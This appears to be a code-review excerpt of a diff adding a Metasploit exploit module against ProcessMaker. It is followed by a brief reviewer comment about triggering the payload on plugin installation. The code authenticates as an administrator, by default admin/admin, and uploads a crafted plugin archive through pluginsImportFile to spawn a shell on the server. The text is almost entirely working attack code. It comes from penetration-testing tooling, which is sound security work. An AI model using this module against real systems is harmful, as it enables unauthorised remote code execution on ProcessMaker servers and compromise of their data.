modules/exploits/multi/http/processmaker_plugin_upload.rb

```diff
@@ -0,0 +1,195 @@
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The username for ProcessMaker', 'admin']),
+        OptString.new('PASSWORD', [true, 'The password for ProcessMaker', 'admin']),
+        OptString.new('WORKSPACE', [true, 'The ProcessMaker workspace', 'workflow'])
+      ])
+  end
+
+  def login(user, pass)
+    vars_post = Hash[{
+      'form[USR_USERNAME]' => Rex::Text.uri_encode(user, 'hex-normal'),
+      'form[USR_PASSWORD]' => Rex::Text.uri_encode(pass, 'hex-normal')
+    }.to_a.shuffle]
+
+    print_status "Authenticating as user '#{user}'"
+    uri = normalize_uri target_uri.path, "/sys#{@workspace}/en/neoclassic/login/authentication.php"
+    res = send_request_cgi 'method'    => 'POST',
+                           'uri'       => uri,
+                           'cookie'    => @cookie,
+                           'vars_post' => vars_post
+
+    if !res
+      fail_with Failure::Unreachable, 'Connection failed'
+    elsif res.code == 200 && res.body =~ /Loading styles and images/
+      # ProcessMaker 2.x and 3.x
+      print_good "#{peer} Authenticated as user '#{user}'"
+    elsif res.code == 302 && res.headers['location'] =~ /(cases|processes)/
+      # ProcessMaker 1.x
+      print_good "#{peer} Authenticated as user '#{user}'"
+    else
+      fail_with Failure::NoAccess, "#{peer} - Authentication failed"
+    end
+  end
+
+  def upload_plugin plugin_name
+    data = generate_plugin plugin_name
+
+    print_status "#{peer} Uploading plugin '#{plugin_name}' (#{data.length} bytes)"
+
+    # ProcessMaker 1.x requires "-" after the plugin name in the file name
+    fname = "#{plugin_name}-.tar"
+
+    boundary = "----WebKitFormBoundary#{rand_text_alphanumeric rand(10) + 5}"
+    post_data = "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"__notValidateThisFields__\"\r\n"
+    post_data << "\r\n\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"DynaformRequiredFields\"\r\n"
+    post_data << "\r\n[]\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"form[PLUGIN_FILENAME]\"; filename=\"#{fname}\"\r\n"
+    post_data << "Content-Type: application/x-tar\r\n"
+    post_data << "\r\n#{data}\r\n"
+    post_data << "--#{boundary}\r\n"
+
+    uri = normalize_uri target_uri.path, "/sys#{@workspace}/en/neoclassic/setup/pluginsImportFile"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'ctype'  => "multipart/form-data; boundary=#{boundary}",
+      'cookie' => @cookie,
+      'data'   => post_data
+    }, 5)
+
+    # Installation spawns a shell, preventing a HTTP response.
+    # If a response is received, something probably went wrong.
+    if res
+      if res.headers['location'] =~ /login/
+        fail_with Failure::NoAccess, 'Administrator privileges are required'
+      else
+        print_warning "#{peer} Unexpected reply"
+      end
+    end
```

Comment:
Although this code block isn't ideal, triggering the payload during plugin installation was the best approach as per comments below.